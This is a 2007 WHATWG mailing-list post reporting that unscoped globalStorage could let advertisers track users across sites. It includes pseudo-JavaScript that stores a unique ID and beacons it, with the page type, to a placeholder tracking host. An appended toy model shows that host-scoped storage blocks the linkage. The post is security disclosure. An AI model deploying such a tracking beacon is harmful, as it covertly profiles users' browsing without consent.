[whatwg] Potential Security Problem in Global Storage Specification
jbanes at gmail.com
Wed May 30 22:13:56 PDT 2007
This is my first post here, so apologies in advance if I'm not quite up on
the list etiquette.
I was just comparing the Storage API with that of the Google
and something jumped out at me. According to the spec, browsers should allow
a webapp to store data in the globalStorage object with no domain attached.
(i.e. globalStorage['']) This is intended to allow data to be shared across
My concern is that this poses a problem for the user's privacy. Let's say
that I'm an Evil Advertisement site. It is in my interest to penetrate the
user's veil of privacy and determine which pages they visit. I've
traditionally used cookies for this, but the browser makers foiled my
attempts by allowing cookies to only be accepted from the originating site.
But thanks to the new globalStorage API, I can store a Unique ID in the
one of my ads.
Here's some rough pseudo-js to demonstrate how it might work:
// createUUID() returns a unique identifier using a random algorithm.
if (!globalStorage[''].evilbit) globalStorage[''].evilbit = createUUID();
document.write('<img src="http://www.eviladagency.com' +
'?type=' + type +
'&tracking=' + globalStorage[''].evilbit + '">');
Is there something I'm missing that would prevent this?
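The concern raised in this message, modelled as an added example (not part of the original post or of the spec text): a toy storage namespace compared under a policy that exposes the '' area to every site and a policy that scopes each area to the page's own host. All names here (canAccess, makeStore, embeddedScript, the .example hosts) are assumptions made for illustration.

```javascript
// Toy model of a keyed storage namespace; not a browser API.
// 'permissive': the '' area is usable from every site, as the post describes.
// 'scoped':     a script may only use the area keyed by the page's own host.
function canAccess(policy, pageHost, areaKey) {
  if (policy === 'scoped') return areaKey === pageHost;
  return areaKey === '' || areaKey === pageHost;
}

function makeStore(policy) {
  const areas = new Map();
  return {
    // Returns the area object, or null when the policy denies access.
    open(pageHost, areaKey) {
      if (!canAccess(policy, pageHost, areaKey)) return null;
      if (!areas.has(areaKey)) areas.set(areaKey, {});
      return areas.get(areaKey);
    },
  };
}

// Third-party script embedded in a page: it prefers the shared '' area and
// falls back to the page's own area. Returns the identifier it would report.
function embeddedScript(store, pageHost, nextId) {
  const area = store.open(pageHost, '') || store.open(pageHost, pageHost);
  if (!area.id) area.id = nextId();
  return area.id;
}

// Visit each site once and count the distinct identifiers reported.
// One identifier across several sites means the visits can be linked.
function distinctIds(policy, sites) {
  let n = 0;
  const nextId = () => 'id-' + (++n); // deterministic stand-in for a UUID
  const store = makeStore(policy);
  return new Set(sites.map((h) => embeddedScript(store, h, nextId))).size;
}

const sites = ['news.example', 'shop.example', 'mail.example']; // constructed
console.log('permissive:', distinctIds('permissive', sites), 'distinct id(s)');
console.log('scoped:    ', distinctIds('scoped', sites), 'distinct id(s)');
```

Under the scoped policy the script still gets a stable identifier per site, but the identifiers differ between sites, so they cannot be joined into one browsing history.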